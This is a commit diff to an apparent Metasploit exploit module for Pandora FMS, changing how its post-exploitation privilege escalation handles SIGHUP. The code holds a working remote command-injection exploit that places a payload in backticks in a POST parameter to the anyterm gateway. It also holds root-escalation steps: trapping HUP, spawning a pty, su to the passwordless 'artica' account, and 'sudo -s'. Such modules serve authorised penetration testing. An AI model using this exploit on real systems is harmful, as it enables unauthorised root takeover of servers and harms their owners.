Better SIGHUP handling

Author: egypt

modules/exploits/linux/http/pandora_fms_exec.rb

@@ -59,16 +59,22 @@ def initialize(info={})
 
   def on_new_session(client)
     print_status("#{peer} - Trying to escalate privileges to root")
-    # Spawn a pty for su/sudo
-    client.shell_command_token("python -c 'import pty;pty.spawn(\"/bin/sh\")'")
-    # Su to the passwordless "artica" account
-    client.shell_command_token("su - artica")
-    # The "artica" use has sudo rights without the need for a password, thus gain root priveleges
-    client.shell_command_token("sudo -s")
-  end
+    [
+      # ignore SIGHUP so the server doesn't kill our root shell
+      "trap '' HUP",
+      # Spawn a pty for su/sudo
+      "python -c 'import pty;pty.spawn(\"/bin/sh\")'",
+      # Su to the passwordless "artica" account
+      "su - artica",
+      # The "artica" use has sudo rights without the need for a
+      # password, thus gain root priveleges
+      "sudo -s",
+    ].each do |command|
+      vprint_status(command)
+      client.shell_write(command + "\n")
+    end
 
-  def peer
-    return "#{rhost}:#{rport}"
+    super
   end
 
   def check
@@ -80,7 +86,7 @@ def check
      'uri'    => normalize_uri(target_uri.path, "anyterm.html")
     })
 
-    if res and res.code == 200 and res.body =~ /Pandora FMS Remote Gateway/
+    if res && res.code == 200 && res.body.include?("Pandora FMS Remote Gateway")
       print_good("#{peer} - Pandora FMS Remote Gateway Detected!")
       return Exploit::CheckCode::Detected
     end
@@ -95,14 +101,13 @@ def exploit
       'uri'    => normalize_uri(target_uri.path, "/anyterm-module"),
       'vars_post'   => {
         'a'     => "open",
-        'p' => "`nohup #{payload.encoded}`"
+        'p' => "`#{payload.encoded}`"
       }
     })
 
-    if not res or res.code != 200
+    if !res || res.code != 200
       fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
     end
-
   end
 
 end